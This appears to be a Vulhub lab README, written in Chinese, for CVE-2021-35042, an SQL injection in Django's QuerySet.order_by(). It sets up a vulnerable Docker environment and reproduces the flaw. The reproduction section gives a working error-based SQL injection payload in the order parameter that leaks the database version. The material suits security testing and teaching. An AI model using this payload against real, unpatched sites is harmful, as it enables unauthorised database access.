aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
63285f61aaf4501a6660be7dfe98c70135c1b89b
vulhub/django/CVE-2021-35042/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

39 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Django QuerySet.order_by()函数SQL注入漏洞CVE-2021-35042
Django是一个高级的Python Web框架支持快速开发和简洁实用的设计。
Django在2021年7月1日发布了安全更新修复了在QuerySet.order_by()函数中存在的SQL注入漏洞。该漏洞影响Django 3.2.5、3.1.13和2.2.24之前的版本。
当用户可以控制传递给order_by()函数的输入时可以在预期的列位置进行SQL注入攻击。
参考链接:
- <https://www.djangoproject.com/weblog/2021/jul/01/security-releases/>
## 环境搭建
执行如下命令编译并启动一个存在漏洞的Django 3.2.4服务器:
```
docker compose build
docker compose up -d
```
环境启动后,访问`http://your-ip:8000`即可看到Django默认首页。
## 漏洞复现
首先访问`http://your-ip:8000/vuln/`,并添加参数`order=-id`以查看按ID降序排序的数据
![](1.png)
要利用SQL注入漏洞使用以下payload修改`order`参数,其中`vuln_collection`是模型名称:
```
http://your-ip:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
```
SQL错误信息将会显示通过基于错误的SQL注入泄露数据库信息
![](2.png)
Reference in New Issue View Git Blame Copy Permalink